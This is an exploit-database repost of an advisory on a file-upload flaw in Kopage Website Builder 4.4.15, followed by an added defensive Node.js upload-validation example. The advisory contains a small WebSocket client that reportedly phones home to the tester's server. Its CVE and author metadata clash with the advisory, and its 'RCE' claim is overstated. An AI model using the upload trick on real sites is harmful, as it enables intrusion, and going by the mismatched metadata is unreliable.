CVE: CVE-2020-25232
Category: CWE-434
Price: $500
Severity: High
Author: Norbert Szetei
Risk: Critical
Exploitation Type: Remote
Date: 2023-12-10

Our sensors found this exploit at:

Below is a copy:

## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE
## Author: nu11secur1ty
## Date: 12/08/2023
## Vendor:
## Software:
## Reference:

## Description:
The file upload function suffers from a file upload vulnerability; there is no strong sanitizing function for uploading some extension files.
In this case, I uploaded an HTML web socket client on their server and then I connected this client with my JavaScript server =)
Depending on the scenario, this can be the end of privacy and even worse than ever!
I am a Penetration Tester, not a stupid cracker! Thank you all!

STATUS: CRITICAL Vulnerability

[+]Exploit client:
(() => {
  const ws = new WebSocket('ws://')
  ws.onopen = () => {
    console.log('ws opened on browser')
    ws.send('hello world you are hacked :D')
  }

  // The handler receives a MessageEvent; the payload is in its data property
  ws.onmessage = (message) => {
    console.log(`message received ${message.data}`)
  }
})()

## Reproduce:

## Proof and Exploit:

## Time spent:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at and
0day Exploit DataBase
home page:
                          nu11secur1ty <>
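
A server-side check of the kind the description reports as missing, written for Node.js as an added example; it is not part of the original advisory and is not Kopage code. The allowlist, the function name `validateUpload` and the sample inputs are assumptions constructed for illustration.

```javascript
const crypto = require('crypto');
const path = require('path');

// Allowlist (assumed): extension -> [Content-Type to serve, magic bytes the content must start with].
const ALLOWED = new Map([
  ['.png', ['image/png', Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a])]],
  ['.jpg', ['image/jpeg', Buffer.from([0xff, 0xd8, 0xff])]],
  ['.jpeg', ['image/jpeg', Buffer.from([0xff, 0xd8, 0xff])]],
  ['.gif', ['image/gif', Buffer.from('GIF8')]],
  ['.pdf', ['application/pdf', Buffer.from('%PDF-')]],
]);

function validateUpload(originalName, content) {
  // The client controls the whole name: keep only the last path component.
  const base = path.posix.basename(String(originalName).replace(/\\/g, '/'));
  if (base.includes('\0')) return { ok: false, reason: 'bad-name' };
  // Only the final extension counts, so "x.png.html" is judged as ".html".
  const ext = path.extname(base).toLowerCase();
  const rule = ALLOWED.get(ext);
  if (!rule) return { ok: false, reason: 'extension-not-allowed' };
  const [contentType, magic] = rule;
  // The bytes must match the claimed type; HTML renamed to .png fails here.
  if (content.length < magic.length || !content.subarray(0, magic.length).equals(magic)) {
    return { ok: false, reason: 'content-mismatch' };
  }
  // Store under a server-generated name; never reuse the client's name.
  const storedName = crypto.randomUUID() + ext;
  return { ok: true, storedName, contentType };
}

// Constructed sample inputs.
const htmlClient = Buffer.from('<html><script>/* active content */</script></html>');
const pngHeader = Buffer.concat([ALLOWED.get('.png')[1], Buffer.alloc(16)]);
const samples = [
  ['client.html', htmlClient],    // HTML upload as in the advisory
  ['client.png', htmlClient],     // same bytes behind an allowed extension
  ['logo.png.html', pngHeader],   // double extension
  ['../../logo.PNG', pngHeader],  // traversal in the name, valid PNG header
];
for (const [name, bytes] of samples) {
  console.log(name, JSON.stringify(validateUpload(name, bytes)));
}
```

Accepted files should be served with the returned Content-Type and `X-Content-Type-Options: nosniff`, from a location where the web server does not execute or render uploads as pages.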

Copyright ©2024 Exploitalert.